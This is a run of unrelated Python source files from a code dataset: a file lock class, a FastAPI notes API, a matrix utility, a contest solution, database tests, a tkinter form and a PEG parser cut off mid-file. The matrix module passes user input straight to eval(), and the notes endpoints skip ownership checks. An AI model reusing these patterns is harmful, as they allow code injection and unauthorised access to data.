think the operation will take, so that the lock doesn't get\n held by a dead process.\n \"\"\"\n self.name = name\n self.maxLockAge = maxLockAge\n\n if os.sep in name:\n raise ValueError('Name cannot contain \"%s\"' % (os.sep,))\n\n if lockDir:\n if lockDir[-1] == os.sep:\n lockDir = lockDir[:-1]\n if not lockDir:\n raise ValueError(\"lockDir cannot be \" + os.sep)\n else:\n lockDir = tempfile.gettempdir()\n\n self.lockDir = lockDir\n\n if not os.path.isdir(lockDir):\n raise ValueError(\n \"lockDir %s either does not exist or is not a directory.\" % (lockDir,)\n )\n\n if not os.access(lockDir, os.W_OK):\n raise ValueError(\"Cannot write to lock directory: %s\" % (lockDir,))\n self.lockPath = lockDir + os.sep + name\n\n self.held = False\n self.acquiredAt = None\n\n def acquire(self, timeout=None):\n \"\"\"\n acquire - Acquire given lock. Can be blocking or nonblocking by providing a timeout.\n Returns \"True\" if you got the lock, otherwise \"False\"\n @param timeout - Max number of seconds to wait, or None to block until we can acquire it.\n @return - True if you got the lock, otherwise False.\n \"\"\"\n if self.held is True:\n # NOTE: Without some type of in-directory marker (like a uuid) we cannot\n # refresh an expired lock accurately\n if os.path.exists(self.lockPath):\n return True\n # Someone removed our lock\n self.held = False\n\n # If we aren't going to poll at least 5 times, give us a smaller interval\n if timeout:\n if timeout / 5.0 < DEFAULT_POLL_TIME:\n pollTime = timeout / 10.0\n else:\n pollTime = DEFAULT_POLL_TIME\n\n endTime = time.time() + timeout\n\n def keepGoing():\n return bool(time.time() < endTime)\n\n else:\n pollTime = DEFAULT_POLL_TIME\n\n def keepGoing():\n return True\n\n success = False\n while keepGoing():\n try:\n os.mkdir(self.lockPath)\n success = True\n break\n except:\n time.sleep(pollTime)\n if self.maxLockAge:\n if (\n os.path.exists(self.lockPath)\n and os.stat(self.lockPath).st_mtime\n < time.time() - self.maxLockAge\n ):\n try:\n os.rmdir(self.lockPath)\n except:\n # If we did not remove the lock, someone else is at the same point and contending. Let them win.\n time.sleep(pollTime)\n\n if success is True:\n self.acquiredAt = time.time()\n\n self.held = success\n return success\n\n def release(self, forceRelease=False):\n \"\"\"\n release - Release the lock.\n @param forceRelease default False - If True, will release the lock even if we don't hold it.\n @return - True if lock is released, otherwise False\n \"\"\"\n if not self.held:\n if forceRelease is False:\n return False # We were not holding the lock\n else:\n self.held = (\n True # If we have force release set, pretend like we held its\n )\n\n if not os.path.exists(self.lockPath):\n self.held = False\n self.acquiredAt = None\n return True\n\n if forceRelease is False:\n # We waited too long and lost the lock\n if self.maxLockAge and time.time() > self.acquiredAt + self.maxLockAge:\n self.held = False\n self.acquiredAt = None\n return False\n\n self.acquiredAt = None\n\n try:\n os.rmdir(self.lockPath)\n self.held = False\n return True\n except:\n self.held = False\n return False\n\n def __checkExpiration(self, mtime=None):\n \"\"\"\n __checkExpiration - Check if we have expired\n\n @param mtime - Optional mtime if known, otherwise will be gathered\n @return - True if we did expire, otherwise False\n \"\"\"\n if not self.maxLockAge:\n return False\n\n if mtime is None:\n try:\n mtime = os.stat(self.lockPath).st_mtime\n except FileNotFoundError as e:\n return False\n\n if mtime < time.time() - self.maxLockAge:\n return True\n\n return False\n\n @property\n def isHeld(self):\n \"\"\"\n isHeld - True if anyone holds the lock, otherwise False.\n @return bool - If lock is held by anyone\n \"\"\"\n if not os.path.exists(self.lockPath):\n return False\n\n try:\n mtime = os.stat(self.lockPath).st_mtime\n except FileNotFoundError as e:\n return False\n\n if self.__checkExpiration(mtime):\n return False\n\n return True\n\n @property\n def hasLock(self):\n \"\"\"\n hasLock - Property, returns True if we have the lock, or False if we do not.\n @return - True/False if we have the lock or not.\n \"\"\"\n # If we don't hold it currently, return False\n if self.held is False:\n return False\n\n # Otherwise if we think we hold it, but it is not held, we have lost it.\n if not self.isHeld:\n self.acquiredAt = None\n self.held = False\n return False\n\n # Check if we expired\n if self.__checkExpiration(self.acquiredAt):\n self.acquiredAt = None\n self.held = False\n return False\n\n return True\n\n\n# vim: set ts=4 sw=4 expandtab :\n","repo_name":"yulinfeng000/DaKaLa","sub_path":"app/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":6904,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"71"} +{"seq_id":"10072115191","text":"from typing import Any, List\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, BackgroundTasks, Depends, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom database.session import get_db\n\nfrom .. import models, schemas, services\n\nrouter = APIRouter()\n\n\n@router.get(\"\", response_model=List[schemas.Note], status_code=status.HTTP_200_OK)\ndef read_notes_by_user(\n *,\n db: Session = Depends(get_db),\n current_user: models.User = Depends(services.get_current_user),\n page_size: int = 30,\n page: int = 1,\n) -> Any:\n notes = services.note.find_by_user(\n db,\n user_id=current_user.id, # type: ignore\n limit=page_size,\n offset=page_size * (page - 1),\n )\n return notes\n\n\n@router.post(\"\", response_model=schemas.Note, status_code=status.HTTP_201_CREATED)\nasync def create_note(\n *,\n db: Session = Depends(get_db),\n note_in: schemas.NoteCreate,\n current_user: models.User = Depends(services.get_current_user),\n background_tasks: BackgroundTasks,\n) -> Any:\n note = services.note.create_with_user(\n db, object_in=note_in, user_id=current_user.id # type: ignore\n )\n background_tasks.add_task(services.note.summarize_note, db, note, note_in.content)\n return note\n\n\n@router.get(\"/{note_id}\", response_model=schemas.Note, status_code=status.HTTP_200_OK)\ndef read_note(\n *,\n db: Session = Depends(get_db),\n note_id: UUID,\n current_user: models.User = Depends(services.get_current_user),\n) -> Any:\n note = services.note.find_one(db, id=note_id)\n if not note:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Note not found\",\n )\n return note\n\n\n@router.patch(\"/{note_id}\", response_model=schemas.Note, status_code=status.HTTP_200_OK)\ndef update_note(\n *,\n db: Session = Depends(get_db),\n note_id: UUID,\n note_in: schemas.NoteUpdate,\n current_user: models.User = Depends(services.get_current_user),\n) -> Any:\n note = services.note.find_one(db, id=note_id)\n if not note:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Note not found\",\n )\n note = services.note.update(db, object_model=note, object_in=note_in)\n return note\n\n\n@router.delete(\"/{note_id}\", status_code=status.HTTP_204_NO_CONTENT)\ndef delete_note(\n *,\n db: Session = Depends(get_db),\n note_id: UUID,\n current_user: models.User = Depends(services.get_current_user),\n) -> Any:\n note = services.note.find_one(db, id=note_id)\n if not note:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"Note not found\",\n )\n services.note.remove(db, object_model=note)\n","repo_name":"pers0n4/WiseNote","sub_path":"server/app/api/note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"33101092028","text":"from Matrix_Knowledge import Explanation\r\nfrom Matrix_Tools import *\r\nfrom Matrix_Operations import *\r\n\r\nMaster_Matrix_Data = {}\r\n\r\n\r\nsample_matrix = [[1,2,3],[1,2,3],[1,2,3]]\r\n\r\nclass Matrix:\r\n\telement = {}\r\n\r\n\tdef __init__(self,nested_list):\r\n\t\tself.rows = len(nested_list)\r\n\t\tself.columns = len(nested_list[0])\r\n\t\tself.__rawmatrix = nested_list\r\n\t\tself.type = self.MatrixType()\r\n\t\tself.trace = self.Trace()\r\n\r\n\t\tfor i in range(self.rows):\r\n\t\t\tfor j in range(self.columns):\r\n\t\t\t\tself.element[f\"{i+1}{j+1}\"] = nested_list[i][j]\r\n\r\n\tdef IsSquare(self,Matrix = None,Explain = True):\r\n\t\tMatrix = self.__rawmatrix\r\n\t\tif type(Explain) == bool:\r\n\t\t\tif Explain:\r\n\t\t\t\tNR = len(Matrix)\r\n\t\t\t\tNC = len(Matrix[0])\r\n\t\t\t\tif NR == NC:\r\n\t\t\t\t\tEXPLAIN(\"Square_True\",(NR,NC))\r\n\t\t\t\telse:\r\n\t\t\t\t\tEXPLAIN(\"Square_False\",(NR,NC))\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\t\telse:\r\n\t\t\tif len(Matrix) == len(Matrix[0]):\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\treturn False\r\n\r\n\tdef IsDiagonal(self,Matrix = None,ReqForVal = False,Explain = True): \r\n\t Reality = False\r\n\t Matrix = self.__rawmatrix\r\n\t \r\n\t DgVal = []\r\n\t \r\n\t if self.IsSquare(Matrix,Explain = None):\r\n\t i = 0\r\n\t j = 0\r\n\t for z in range(len(Matrix)*len(Matrix[0])):\r\n\t if (i != j and Matrix[i][j] != 0) or (i == j and Matrix[i][j] == 0):\r\n\t Reality = False\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Diagonal_Matrix_False\")\r\n\t break\r\n\t else:\r\n\t pass\r\n\t if j < len(Matrix[0]) - 1:\r\n\t j += 1\r\n\t else:\r\n\t j = 0\r\n\t i += 1\r\n\t else:\r\n\t Reality = True\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Diagonal_Matrix_True\")\r\n\t \r\n\t \r\n\t if ReqForVal:\r\n\t for g in range(len(Matrix)):\r\n\t DgVal.append(Matrix[g][g])\r\n\t else:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Diagonal_Matrix_Not_Square\")\r\n\t if DgVal: \r\n\t return Reality,DgVal\r\n\t else:\r\n\t return Reality\r\n\r\n\tdef IsScalar(self,Matrix = None,ReqForVal = False,Explain = True):\r\n\t Reality = False\r\n\t Matrix = self.__rawmatrix\r\n\t if self.IsDiagonal(Matrix):\r\n\t a,b = self.IsDiagonal(Matrix,True)\r\n\t x = b[0]\r\n\t for i in range(1,len(b)):\r\n\t if b[i] != x:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Scalar_False\")\r\n\t break\r\n\t else:\r\n\t Reality = True\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Scalar_True\",(x,x,len(b)))\r\n\t else:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Scalar_Matrix_Not_Diagonal\")\r\n\r\n\t if ReqForVal:\r\n\t return Reality,x\r\n\t else:\r\n\t return Reality\r\n\r\n \r\n\tdef ReturnScalarVal(self,Matrix):\r\n\t try:\r\n\t a,b = self.IsScalar(Matrix,True)\r\n\t if b:\r\n\t return b\r\n\t except:\r\n\t print(\"Unsuitable Matrix given to find scalar value\")\r\n \r\n\tdef IsIdentity(self,Matrix = None,Explain = True):\r\n\t if self.IsScalar(self.__rawmatrix):\r\n\t if ReturnScalarVal(self.__rawmatrix) == 1:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Identity_True\",(len(self.__rawmatrix),))\r\n\t return True\r\n\t else:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Identity_False\",(self.__rawmatrix[0][0],))\r\n\t return False\r\n\t else:\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Identity_Matrix_Not_Scalar\")\r\n\t return False\r\n\r\n\tdef ReturnDiagonal(self,Matrix = None):\r\n\t try:\r\n\t a,b = self.IsDiagonal(self.__rawmatrix,True)\r\n\t if b:\r\n\t return b\r\n\t except:\r\n\t print(\"Ineligible Matrix given to return diagonal\")\r\n \r\n\tdef IsNull(self,Matrix = None,Explain = True):\r\n\t Reality = False\r\n\t i = j = 0\r\n\t for z in range(len(self.__rawmatrix)*len(self.__rawmatrix[0])):\r\n\t if self.__rawmatrix[i][j] != 0:\r\n\t Reality = False\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Null_False\")\r\n\r\n\t break\r\n\t \r\n\t if j < len(self.__rawmatrix[0]) - 1:\r\n\t j += 1\r\n\t else:\r\n\t j = 0\r\n\t i += 1\r\n\t else:\r\n\t Reality = True\r\n\t if Explain == True:\r\n\t EXPLAIN(\"Null_True\")\r\n\t return Reality\r\n\r\n\r\n\tdef MatrixType(self,Matrix = None):\r\n\r\n\t if len(self.__rawmatrix) == 1:\r\n\t return(\"Row Matrix\")\r\n\t elif len(self.__rawmatrix[0]) == 1:\r\n\t return(\"Coloumn Matrix\")\r\n\t elif self.IsIdentity(self.__rawmatrix):\r\n\t return(\"Identity Matrix\")\r\n\t elif self.IsScalar(self.__rawmatrix):\r\n\t return(\"Scalar Matrix\")\r\n\t elif self.IsDiagonal(self.__rawmatrix):\r\n\t return(\"Diagonal Matrix\")\r\n\t elif self.IsNull(self.__rawmatrix):\r\n\t return(\"Null Matrix\")\r\n\t elif self.IsSquare(self.__rawmatrix):\r\n\t return(\"Square Matrix\")\r\n\t else:\r\n\t return(\"Rectangular Matrix\")\r\n\r\n\tdef Trace(self):\r\n\t if self.IsDiagonal(self.__rawmatrix):\r\n\t x = 0\r\n\t for i in self.ReturnDiagonal(self.__rawmatrix):\r\n\t x += i\r\n\t return x\r\n\t else:\r\n\t \treturn \"Given Matrix is ineligible to have attribute 'trace'\"\r\n\r\n\tdef __str__(self):\r\n\t Matrix = self.__rawmatrix\r\n\t spacing = [1]*len(Matrix[0])\r\n\t top_bottom_spacing = 0\r\n\r\n\r\n\t for i in range(len(Matrix)):\r\n\t for j in range(len(Matrix[0])):\r\n\t a = len(str(Matrix[i][j]))\r\n\t if a > spacing[j]:\r\n\t spacing[j] = a\r\n\t else:\r\n\t \tfor x in spacing:\r\n\t top_bottom_spacing += x\r\n\t \r\n\t Matrix_str = ''\r\n\t \r\n\t for i in range(len(Matrix)):\r\n\t if i == 0:\r\n\t Matrix_str += '┌'+ ' '*(top_bottom_spacing + 2 + len(spacing) - 1) + '┐' + '\\n'\r\n\r\n\t Matrix_str += '│ '\r\n\r\n\r\n\t for j in range(len(spacing)):\r\n\t Matrix_str += ' '*(spacing[j] - len(str(Matrix[i][j]))) + str(Matrix[i][j]) + ' '\r\n\t Matrix_str += '│' + '\\n'\r\n\t else:\r\n\t Matrix_str += '└'+ ' '*(top_bottom_spacing + 2 + len(spacing) - 1) + '┘' + '\\n'\r\n\r\n\t return Matrix_str\t\t\r\n\r\n\tdef __add__(self,other):\r\n\t\tif type(other) == int: #Scalar Addition\r\n\t\t\tScalarAddition(self.__rawmatrix,other,Explain = True)\r\n\t\telif type(self) == type(other): #Matrix Addition\r\n\t\t\tMatrixAddition(self.__rawmatrix,other.__rawmatrix,Explain = True)\r\n\t\telse:\r\n\t\t\tprint(f\"Unsupported Operand between Matrix and {type(other)}\")\r\n\r\n\tdef __sub__(self,other):\r\n\t\tif type(other) == int:\r\n\t\t\tScalarAddition(self.__rawmatrix,-other,Explain = True)\r\n\t\telif type(self) == type(other):\r\n\t\t\tMatrixSubtraction(self.__rawmatrix,other.__rawmatrix,Explain = True)\r\n\t\telse:\r\n\t\t\tprint(f\"Unsupported Operand between Matrix and {type(other)}\")\t\r\n\r\n\tdef __mul__(self,other):\r\n\t\tif type(other) == int:\r\n\t\t\tScalarMultiplication(self.__rawmatrix,other,Explain = True)\r\n\t\telif type(self) == type(other):\r\n\t\t\tMatrixMultiplication(self.__rawmatrix,other.__rawmatrix,Explain = True)\r\n\t\telse:\r\n\t\t\tprint(f\"Unsupported Operand between Matrix and {type(other)}\")\t\t\r\n\r\n\tdef __pow__(self,other):\r\n\t\tprint(other)\r\n\t\t\r\n\t\tif type(other) == int:\r\n\t\t\tScalarPower(self.__rawmatrix,other)\r\n\t\telif type(self) == type(other):\r\n\t\t\tMatrixPower(self.__rawmatrix,other.__rawmatrix)\r\n\t\telse:\r\n\t\t\tprint(f\"Unsupported Operand between Matrix and {type(other)}\")\t\r\n\t\t\r\n\r\nx = Matrix(sample_matrix)\r\ndef execute_user_input(input_):\r\n\ttry:\r\n\t\t_a = eval(input_)\r\n\t\tprint(Explanation_Result['value'])\r\n\t\treturn Explanation_Result['value']\r\n\texcept:\r\n\t\treturn \"Expression was not able to be executed. Please check your syntax\"\r\n\r\n\r\n","repo_name":"gk9516/OMNISCIENT-WIZARD-","sub_path":"Matrices_Master_Module.py","file_name":"Matrices_Master_Module.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"71142750310","text":"for _ in range(int(input())):\r\n n = int(input())\r\n arr = list(map(int, input().split()))\r\n ch = [-1]*(n+1)\r\n ans = [0]*(n+1)\r\n for i in range(n):\r\n if ch[arr[i]] == -1:\r\n ans[arr[i]] += 1\r\n elif ch[arr[i]] >= 0:\r\n dist = abs(ch[arr[i]] - i - 1)\r\n if dist%2 == 0:\r\n # print(arr[i], ch[arr[i]], i)\r\n ans[arr[i]] += 1\r\n ch[arr[i]] = i\r\n\r\n print(\" \".join([str(ans[i]) for i in range(1, n+1)]))\r\n","repo_name":"Azim-Islam/Problem-Solving-DSA","sub_path":"CodeForces/round_809_div2/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"73163013669","text":"import unittest\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import Session \r\nimport os\r\n\r\nfrom automationv3.requirements.models import Requirement\r\n\r\nclass TestRequirements(unittest.TestCase):\r\n def setUp(self):\r\n self.db_file = \"test_requirements.db\"\r\n engine = create_engine(f\"sqlite:///{self.db_file}\")\r\n self.session = Session(engine) \r\n\r\n Requirement.metadata.create_all(engine)\r\n\r\n reqs = [\r\n Requirement(id=\"R1\", text=\"Test requirement 1\", subsystem=\"Test subsystem 1\"),\r\n Requirement(id=\"R2\", text=\"Test requirement 2\", subsystem=\"Test subsystem 2\"),\r\n ]\r\n self.session.add_all(reqs)\r\n self.session.commit()\r\n\r\n def tearDown(self):\r\n self.session.close()\r\n os.remove(self.db_file)\r\n\r\n def test_add_and_get(self):\r\n self.session.add(Requirement(id=\"R3\", text=\"Test requirement\", subsystem=\"Test subsystem\"))\r\n self.session.commit()\r\n result = self.session.query(Requirement).filter(Requirement.id == 'R3').one()\r\n self.assertEqual(result.id, \"R3\")\r\n self.assertEqual(result.text, \"Test requirement\")\r\n self.assertEqual(result.subsystem, \"Test subsystem\")\r\n\r\n def test_get_all(self):\r\n results = self.session.query(Requirement).all()\r\n self.assertEqual(len(results), 2)\r\n self.assertEqual(results[0].id, \"R1\")\r\n self.assertEqual(results[1].id, \"R2\")\r\n \r\n def test_get_by_subsystem(self):\r\n results = self.session.query(Requirement).filter(Requirement.subsystem == 'Test subsystem 2').all()\r\n self.assertEqual(len(results), 1)\r\n self.assertEqual(results[0].id, \"R2\")\r\n\r\n def test_get_subsystem(self):\r\n results = [r.subsystem \r\n for r in self.session.query(Requirement.subsystem).distinct()]\r\n self.assertEqual(len(results), 2)\r\n self.assertEqual(results[0], \"Test subsystem 1\")\r\n self.assertEqual(results[1], \"Test subsystem 2\")\r\n\r\n def test_delete(self):\r\n result = self.session.query(Requirement).filter(Requirement.id == 'R1').one()\r\n self.session.delete(result)\r\n self.session.commit()\r\n result = self.session.query(Requirement).filter(Requirement.id == 'R1').first()\r\n self.assertIsNone(result)\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"fillet54/automation-v3","sub_path":"test/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"33958922448","text":"import tkinter as tk\nfrom tkinter import ttk\n\ni = 0\ndef capture():\n print('Capture Mode')\n lblMenu['text'] = 'capture'\n\ndef liveView():\n print('Live View Mode')\n lblMenu['text'] = 'LIVE'\n\ndef sendButtonPressed():\n print('Button pressed')\n label_command['text'] = '\\nButton pressed!\\n'\n nCapture = entry_capture.get()\n nSamples = entry_sample.get()\n sampleRate = entry_rate.get()\n\n print(nCapture)\n print(nSamples)\n print(sampleRate)\n\n global i\n i += 1\n print(i)\n bar_var.set(i)\n \n\nmainWindow = tk.Tk()\nmainWindow.title(\"PIBITI-2019\")\n\n#dimensoes da janela\nwindowWidth = 480\nwindowHeight = 320\nscreenWidth = mainWindow.winfo_screenwidth()\nscreenHeight = mainWindow.winfo_screenheight()\nposx =screenWidth/2 - windowWidth/2 \nposy =screenHeight/2 - windowHeight/2\n\nmainWindow.geometry(\"%dx%d+%d+%d\" % (windowWidth,windowHeight,posx,posy))\nmainWindow.minsize(width = windowWidth, height = windowHeight)\n\n#aparencia\n\nmainWindow.iconbitmap(\"code/resources/icon/if.ico\")\nmainWindow.state(\"zoomed\") \n#mainWindow['bg'] = \"gray\"\n\n'''\nbtnCapture = tk.Button(mainWindow, text = \"Capture\", command = capture)\nbtnLive = tk.Button(mainWindow, text = \"Live View\", command = liveView)\nlblMenu = tk.Label(\n mainWindow,\n text = \"What do you want to do?\", \n relief = \"groove\",\n font = \"Arial 30 bold\",\n justify = \"left\",\n width = \"50\",\n height = 2,\n anchor = 'w')\n'''\n\n\n#---------------------------------------------------------------------------------------\n#---------------------------------------------------------------------------------------\n\n##OPERATION frame\n\nframe_operation = tk.Frame(mainWindow)\n\n### widgets\n\nlabel_operation = tk.Label(frame_operation, bg = \"blue\",text=\"Operation\")\n\nlabel_capture = tk.Label(frame_operation,text=\"Number of Captures:\")\nentry_capture = tk.Entry(frame_operation)\nlabel_sample = tk.Label(frame_operation,text=\"Number of Samples:\")\nentry_sample = tk.Entry(frame_operation)\nlabel_rate = tk.Label(frame_operation,text=\"Sample Rate(ms):\")\nentry_rate = tk.Entry(frame_operation)\n\n### layout\n\nlabel_operation.grid(sticky=\"we\",rowspan=2)\n\nlabel_capture.grid(sticky='we')\nentry_capture.grid(sticky='we')\nlabel_sample.grid(sticky='we')\nentry_sample.grid(sticky='we')\nlabel_rate.grid(sticky='we')\nentry_rate.grid(sticky='we')\n\n\n##Graphics Frame\n\n### widgets\n\n### layout\n\n\n##ADDITIONAL Frame\n\nframe_additional = tk.Frame(mainWindow)\n\n### widgets\n\nlabel_additional = tk.Label(frame_additional,text = \"ADDITIONAL\",bg = 'blue')\n\nbutton_command = tk.Button(frame_additional,text=\"SEND\\nCOMMAND\",command = sendButtonPressed)#lambda: sendButtonPressed(i))\nlabel_command = tk.Label(frame_additional,text = '\\n\\n\\n')\nlabel_progress = tk.Label(frame_additional,text ='Progress')\n\nbar_var = tk.DoubleVar()\nbar_var.set(i)\nbar_progress = ttk.Progressbar(frame_additional,variable=bar_var,maximum=10)\n\n### layout\n\nlabel_additional.grid(sticky='we',rowspan=2)\n\nbutton_command.grid(sticky=\"we\",rowspan=2)\nlabel_command.grid(sticky='we')\n\nlabel_progress.grid(sticky='we')\nbar_progress.grid(sticky='we')\n\n##TERMINAL frame\n\n### widgets\n\n#tkTerminal = tk.Label(mainWindow, bg = \"red\",text=\"Terminal\")\n\n#tkTerminal.grid(row=6,column=1,sticky=\"nswe\",rowspan=3)\n\n### layout\n\n#tkAdditional.grid(row=6,column=0,sticky=\"we\")\n\n## GERAL\nframe_operation.grid()\nframe_additional.grid()\n\nmainWindow.mainloop()","repo_name":"rodrigodbernardo/PIBITI-2019_mqtt-ver","sub_path":"code/test/python-tkinter/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"69964673509","text":"from enum import Enum, auto\n\n\nclass TokenType(Enum):\n # Single-character tokens.\n LEFT_PAREN = auto()\n RIGHT_PAREN = auto()\n LEFT_BRACE = auto()\n RIGHT_BRACE = auto()\n LEFT_BRACKET = auto()\n RIGHT_BRACKET = auto()\n\n COMMA = auto()\n DOT = auto()\n MINUS = auto()\n PLUS = auto()\n SEMICOLON = auto()\n SLASH = auto()\n STAR = auto()\n QUESTION_MARK = auto()\n COLON = auto()\n\n # One or two character tokens.\n BANG = auto()\n BANG_EQUAL = auto()\n\n EQUAL = auto()\n EQUAL_EQUAL = auto()\n\n GREATER = auto()\n GREATER_EQUAL = auto()\n\n LESS = auto()\n LESS_EQUAL = auto()\n\n # Literals.\n IDENTIFIER = auto()\n STRING = auto()\n NUMBER = auto()\n\n # Keywords.\n AND = auto()\n BREAK = auto()\n CLASS = auto()\n ELSE = auto()\n FALSE = auto()\n FUN = auto()\n FOR = auto()\n IF = auto()\n NIL = auto()\n OR = auto()\n\n PRINT = auto()\n RETURN = auto()\n SUPER = auto()\n THIS = auto()\n TRUE = auto()\n VAR = auto()\n WHILE = auto()\n\n EOF = auto()\n\n\nEQUALITY_TOKENS = (\n TokenType.BANG_EQUAL,\n TokenType.EQUAL_EQUAL\n)\n\nCOMPARISON_TOKENS = (\n TokenType.GREATER,\n TokenType.GREATER_EQUAL,\n TokenType.LESS,\n TokenType.LESS_EQUAL\n)\n\nADDITION_TOKENS = (\n TokenType.MINUS,\n TokenType.PLUS\n)\n\nMULTIPLICATION_TOKENS = (\n TokenType.SLASH,\n TokenType.STAR\n)\n\nKEYWORD_TOKENS = (\n TokenType.BREAK,\n TokenType.CLASS,\n TokenType.FUN,\n TokenType.VAR,\n TokenType.FOR,\n TokenType.IF,\n TokenType.WHILE,\n TokenType.PRINT,\n TokenType.RETURN\n)\n","repo_name":"jepebe/plox","sub_path":"plox/token_type.py","file_name":"token_type.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"13070781747","text":"\"\"\"\nThis PEG parser is made up of three core functions: _atom, _choice and _sequence\nEach corresponds to that type of PEG rule, and returns one of the following:\n None - the tokens did not match the rule\n ParseTree(None, []) - the lookahead succeeded or optional atom matched nothing\n ParseTree(None, [...]) - the tokens matched a sub-rule (defined with `()`)\n ParseTree(str name, [...]) - the tokens matched a named rule\n str - this atom was matched\n\nParseTrees are combined with the .add function, making named rules sub-trees\nand collapsing down sub-rules to a flat level.\nRules that start with _ are also collapsed.\nRules have tailing _ stripped.\n\nThe grammar is a dictionary mapping rules to functions which implement it. The\nsyntax is similar to standard PEG with the addition of $type which matches any\ntokens of a certain type.\n\"\"\"\n\nclass ParseTree:\n def __init__(self, rule=None, children=None):\n self.rule = rule\n self.children = []\n self.length = 0\n for child in (children or []):\n self.add(child)\n\n def add(self, res):\n if isinstance(res, int):\n raise TypeError\n if isinstance(res, ParseTree):\n self.length += res.length\n if res.rule is None or res.rule[0] == \"_\":\n self.children += res.children\n else:\n self.children.append(res)\n else:\n self.children.append(res)\n self.length += 1\n\n def print(self, depth):\n res = \" \" * depth + \"P\" + str(self.rule) + \"\\n\"\n for child in self.children:\n if isinstance(child, str):\n res += \" \" * (depth + 1) + child + \"\\n\"\n else:\n res += child.print(depth + 1)\n return res\n\n def __repr__(self):\n return self.print(0)\n\n# memoization decorator\ndef memo(fn):\n called = {}\n def wrapper(tokens):\n t = tuple(t.val for t in tokens)\n if t not in called:\n called[t] = fn(tokens)\n return called[t]\n return wrapper\n\n# Matches first option\ndef choice(options):\n @memo\n def _choice(tokens):\n for option in options:\n res = option(tokens)\n if res is not None:\n return res\n return None\n return _choice\n\n# Matches all of passed rules or none\ndef sequence(rules):\n @memo\n def _sequence(tokens):\n total = ParseTree()\n for rule in rules:\n res = rule(tokens[total.length:])\n if res is None:\n return None\n total.add(res)\n return total\n return _sequence\n\n# Implements an atom (a string literal or a reference to a rule) with optional\n# modifiers (*, !, ?, etc). Rule is a tuple of (modifier, value)\ndef atom(rule):\n # determines if tokens matches the rule, ignoring modifiers.\n def _trueAtom(tokens):\n if isinstance(rule[1], str):\n if rule[1][0] == \"'\" and rule[1][-1] == \"'\":\n if rule == \"''\":\n return \"\"\n if len(tokens) > 0 and tokens[0] == rule[1][1:-1]:\n return rule[1][1:-1]\n return None\n if rule[1][0] == \"$\":\n if len(tokens) > 0 and tokens[0].type == rule[1][1:]:\n return tokens[0].val\n return None\n res = grammar[rule[1]](tokens)\n if res is None:\n return None\n return ParseTree(rule[1].rstrip(\"_\"), [res])\n return rule[1](tokens)\n\n # determines if tokens matches the rule, including modifiers.\n @memo\n def _atom(tokens):\n if rule[0] is None:\n return _trueAtom(tokens)\n if rule[0] == \"?\":\n return _trueAtom(tokens) or ParseTree()\n total = ParseTree()\n if rule[0] == \"+\":\n res = _trueAtom(tokens)\n if res is None:\n return None\n total.add(res)\n if rule[0] in \"+*\":\n while True:\n res = _trueAtom(tokens[total.length:])\n if res is None:\n return total\n total.add(res)\n if rule[0] == \"&\":\n if _trueAtom(tokens) is None:\n return None\n return ParseTree()\n if rule[0] == \"!\":\n if _trueAtom(tokens) is None:\n return ParseTree()\n return None\n raise AssertionError(\"rule was \" + str(rule))\n return _atom\n\n# only split string at splitter when not in a quote and at the lowest (depth)\ndef smartSplit(string, splitter):\n res = []\n last = 0\n depth = 0\n inQuote = False\n for i, c in enumerate(string):\n if c == \"'\":\n inQuote = not inQuote\n elif not inQuote and c == \"(\":\n depth += 1\n elif not inQuote and c == \")\":\n depth -= 1\n else:\n if not inQuote and depth == 0 and c == splitter:\n res.append(string[last:i])\n last = i + 1\n res.append(string[last:])\n return res\n\n# called on the text of each rule (and sub-rule). Splits it into choices / atoms\n# and wraps the related functions.\ndef _load(text):\n def _atom(text):\n if text[0] in \"&!\":\n res = [text[0], text[1:]]\n elif text[-1] in \"?+*\":\n res = [text[-1], text[:-1]]\n else:\n res = [None, text]\n if res[1][0] == \"(\" and res[1][-1] == \")\":\n res[1] = _load(res[1][1:-1])\n return atom(res)\n def _sequence(text):\n res = []\n for s in smartSplit(text, \" \"):\n res.append(_atom(s.strip()))\n return sequence(res)\n res = choice([_sequence(c.strip()) for c in smartSplit(text, \"/\")])\n return res\n\n# load the grammar\ngrammar = {}\ndef load(text):\n rules = {}\n for line in text.splitlines():\n if line.strip() == '':\n continue\n name, rule = line.split(\"=\", 1)\n rules[name.strip()] = rule.strip()\n for name, rule in rules.items():\n grammar[name.strip()] = 